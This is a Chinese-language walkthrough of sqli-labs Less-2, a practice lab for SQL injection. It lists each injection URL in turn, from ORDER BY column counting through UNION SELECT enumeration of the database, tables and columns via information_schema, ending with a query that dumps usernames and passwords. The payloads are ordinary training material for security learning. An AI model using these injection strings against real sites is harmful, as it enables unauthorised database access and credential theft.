sqli-labs练习(第二关)——数字型

1、先判断是字符型还是数字型。

172.16.11.222/sqli-labs/Less-2/?id=1
sqli-labs练习(第二关)——数字型_第1张图片sqli-labs练习(第二关)——数字型_第2张图片sqli-labs练习(第二关)——数字型_第3张图片
id=2-1 与 id=1的结果一样,说明是数字型。

2、确认字段位数

172.16.11.222/sqli-labs/Less-2/?id=1 order by 3
sqli-labs练习(第二关)——数字型_第4张图片sqli-labs练习(第二关)——数字型_第5张图片
一共3位

3、确认占位信息

172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,3 --+
sqli-labs练习(第二关)——数字型_第6张图片

4、找库名

http://172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,database() --+

sqli-labs练习(第二关)——数字型_第7张图片
库名是security

5、找表名

172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
sqli-labs练习(第二关)——数字型_第8张图片
表名有emails、referers、uagents、users

6、找字段名

172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.COLUMNs where table_schema='security' and table_name='users'--+
sqli-labs练习(第二关)——数字型_第9张图片
users表里有id、username、password三个字段

7、找账号密码信息

172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(concat_ws(',',username,password) SEPARATOR '|') from users --+
sqli-labs练习(第二关)——数字型_第10张图片
这与字符型差不多,只是少了第二步的"'而已

你可能感兴趣的:(sql注入,sql)